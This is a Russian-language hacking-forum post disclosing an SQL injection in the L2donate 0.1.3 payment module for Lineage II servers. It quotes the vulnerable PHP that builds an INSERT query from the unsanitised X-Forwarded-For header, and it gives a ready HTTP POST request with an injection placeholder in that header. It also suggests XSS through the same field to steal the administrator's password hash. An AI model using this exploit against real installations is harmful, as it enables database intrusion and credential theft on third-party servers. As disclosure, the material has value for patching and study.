Форум АНТИЧАТ - SQL injection в L2donate

L2donate система платных услуг LineageII
Офф сайт: http://l2donate.ru/
Версия: 0.1.3

уязвимость в модулях: client/modules/*/index.php

Например: client/modules/system/index.php

PHP код:


		
			
    $fromip = $_SERVER['REMOTE_ADDR'];

        if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {

            $fromip .= $_SERVER['HTTP_X_FORWARDED_FOR'];

        }

        if(isset($_SERVER['REMOTE_HOST'])) {

            $fromip .= '--'.$_SERVER['REMOTE_HOST'];

        }

        

        $fields = "ip='".$fromip."', login='".$login."' ,redirecturl='', transid=''

        , status='0', sellingamount='".$sellingCurrencyAmount."'

        , accountingamount='0', gateway='".trim($request['fill'])."'

        , amount='0', result='', trans_date='".date('Y-m-j H:i:s')."'";

        $result = $db['prim']->query("INSERT INTO ".DB_PREFIX."transactions SET ".$fields);

Пример эксплуатации:

POST /client/?module=systems HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://localhost/client/?module=systems
Cookie: logged_usr=1; login_usr=test; pass_usr=qUqP5cyxm6YcTAhz05Hph5gvu9M%3D; auth_usr_hash=68f522804fda3638ef8a710bfa790513; PHPSESSID=e37cf42680902ad6c4edfb5e51dc2c85
X_FORWARDED_FOR: ',{SQL}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
login=test&fill=systems&action=paymentpage&selling currencyamount=111

Пароль администратора хранится в файле, поэтому через скулю до него не добраться...

Есть возможность проведения xss в поле X_FORWARDED_FOR, с помощью чего можно получить md5 хеш админа.